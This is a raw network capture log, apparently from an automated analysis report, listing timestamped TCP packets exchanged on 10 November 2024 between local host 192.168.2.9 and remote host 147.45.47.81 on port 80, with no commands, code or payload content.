                                                                                                                                                                                Nov 10, 2024 09:18:27.707289934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707300901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707328081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707355976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707367897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707380056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707391024 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707393885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707408905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707416058 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707418919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707431078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707443953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707454920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707456112 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707467079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707477093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707480907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707489967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707494020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707528114 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707544088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707556009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707608938 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707614899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707626104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707637072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707653999 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707676888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.764935017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.764969110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.764997005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765012026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765022993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765028954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765038013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765048027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765060902 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765081882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765086889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765094995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765114069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765115023 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765125036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765136003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765162945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765165091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765176058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765186071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765187979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765211105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765280962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765290976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765319109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.765326023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765336037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.765368938 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.820915937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.820954084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.820966959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.820997953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821432114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821441889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821464062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821496964 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821518898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821518898 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821532011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821544886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821574926 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821607113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821618080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821638107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821650982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821662903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821666002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821679115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821686983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821707010 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821738005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821753025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821785927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821791887 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.821796894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821814060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.821878910 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822002888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822016001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822022915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822027922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822035074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822041035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822053909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822057962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822088003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822101116 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822120905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822133064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822144985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822155952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822168112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822168112 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822180033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822201014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822236061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822258949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822278023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822304010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822315931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822315931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822359085 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822387934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822405100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822422028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822446108 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822478056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822540998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822552919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822565079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822582960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822597980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822609901 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822613955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822628975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822635889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822640896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822669029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822841883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822870970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822881937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822891951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822916985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.822953939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822966099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822984934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.822995901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823008060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823009014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823019981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823040009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823048115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823057890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823069096 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823070049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823098898 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823431969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823443890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823458910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823477030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823482990 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823488951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823497057 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823510885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823524952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823537111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823546886 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823548079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.823565960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.823580027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.863287926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.863348961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.863403082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880461931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880474091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880537987 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880558968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880618095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880631924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880652905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880665064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880676985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880680084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880711079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880712032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880718946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880723000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880739927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880769014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880789042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880815983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880829096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880841017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880855083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.880861044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880877018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.880892992 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.927190065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.927202940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.927267075 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.936552048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.936564922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.936577082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.936606884 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937175989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937216997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937228918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937228918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937295914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937314034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937325001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937339067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937365055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937372923 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937376976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937391043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937402964 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937414885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937427044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937448978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937453985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937465906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937494993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937501907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937514067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937526941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937537909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937551975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937557936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937562943 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937585115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937587023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937598944 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937618017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937628984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937663078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937674999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937686920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937704086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937716961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937736034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937736034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937792063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937804937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937824011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937845945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937860966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937875032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937930107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937942982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937954903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937972069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.937973022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937993050 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.937997103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938040972 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938044071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938056946 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938069105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938093901 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938117027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938159943 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938174963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938184977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938196898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938222885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938260078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938271999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938286066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938297987 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938329935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938353062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938371897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938384056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938396931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938426018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938445091 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938601017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938612938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938626051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938653946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938690901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938704014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938714981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938725948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938740969 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938745975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938755989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938771009 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938781977 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938805103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938817024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938854933 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.938971996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938983917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.938996077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.939016104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.939024925 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.939028025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.939047098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.939063072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.939074993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.939086914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.939126015 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.996296883 CET8049833147.45.47.81192.168.2.9
